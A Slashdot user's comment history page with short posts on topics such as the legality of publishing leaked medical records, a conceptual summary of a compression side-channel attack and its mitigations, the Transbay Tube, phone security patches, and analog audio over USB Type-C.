Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?
Compare cell phone plans using Wirefly's innovative plan comparison tool ×

Comment Re:All the data means all the data (Score 1) 304

No, it isn't. At least in the US, posting medical records publically is only illegal if you yourself are a "covered entity," e.g. a member of the health-care team bound by law to keep medical records private. If you're a journalist (or some other random person like Julian Assange) and someone gives you a medical record, you're legally free to post it everywhere you want. The only person breaking the law is the person at the start of the chain. This is similar to how government leaks work--Woodward and Bernstein are within their rights to publish, and the only person breaking the law is Deep Throat.


Comment Re:If You're not rich, have a bright future! (Score 1) 367

The labor might be that cheap, but do they work strict 40 hour work weeks, use OSHA approved equipment, can afford a livable quality of life (support a family comfortably, take vacations twice a year), get fully paid health insurance, dental etc for that $5-7 a day?

Comment Synopsis (Score 5, Informative) 102

I'm not a fan of that article summary.

New summary:
It is the same as CRIME, but we're using your browser's performance timing JS API as the man-in-the-middle.

A review:
Stick sensitive info into compressed stuff, and you make that sensitive info less private. If the encryption is zlib-like, then the attacker can guess the information quite quickly-- a good compressor compresses substrings, not just the whole thing.
That means that if you have a SSN in there, the attacker can guess some substrings of your SSN, and the response won't be much bigger.
Guesses that don't share substrings with your SSN will be larger-- the attacker can reject those as bad guesses and not try those substrings again.

With HTTP2's HPACK compressor (only used for info in the headers), this side-channel is eliminated-- only an exact guess of the data will allow this to happen.This is completely unrelated, however, to someone using entity-body compression with HTTP2. If you mix sensitive data with everything else in the compressed-entity body... side channel attacks galore!

A mitigation: Don't put the sensitive data in the same resource as the non-sensitive data, and then don't compress the sensitive data.
HTTP2 makes this cheaper. If sites do this, then these attacks simply do not work any better than the brute-force guessing would.
Ensuring that this happens (no sensitive data compressed) isn't necessarily the most easy thing...

Another obvious one is disable the timing API for 3rd party stuff. This is not as effective theoretically, but it is way easier to deploy and makes these kinds of attacks require an external 3rd party.

Comment Re:What's the big problem? (Score 1) 675

I either do a straight line or an X. The card (and thus my purchases with it) are protected against fraud. What's the point of signing it? The signature is absolutely not cross checked against any kind of database for validity. I don't have time to be wasting on a fancy signature that nobody will ever look at and doesn't matter.

Comment San Francisco's Transbay Tube (Score 3, Interesting) 84

San Francisco's Transbay Tube does this. It's a bunch of segments bolted together, and then it was weighted down with thousands of pounds of granite fill/gravel and they pumped all the water out of it. The bottom of the San Francisco bay is pretty flat and muddy compared to Norway, I suspect, so they just let it sit on the bottom, rather than precariously suspend it in the water(?!?)

Comment Re:Fuck you Motorola/Lenovo (Score 1) 162

They finally pushed out a... June? 2016 security patch to my Moto X. I think this fixed the bug where the radio would get woken up from sleep mode, but not return to sleep when done, which ate up my battery like crazy. The Moto X was my first Non-Nexus phone in years... now I'm back with a Nexus 5x, at least Google patches their shit.

Comment Re:Analogue vs Digital, and DRM (Score 2) 536

USB Type-C allows for analog out to a pair of dumb headphones. You can either connect a pair of native Type-C dumb headphones (dumbphones?) or a 3.5mm set of dumbphones to a $3 adapter.
There will also be digital headphones and powered dumphones, but USB Type-C can totally be used to pass an analog signal from inside the phone, directly to a tiny set of speakers strapped to your head. There's no DRM in analog audio signals.

Slashdot Top Deals

There must be more to life than having everything. -- Maurice Sendak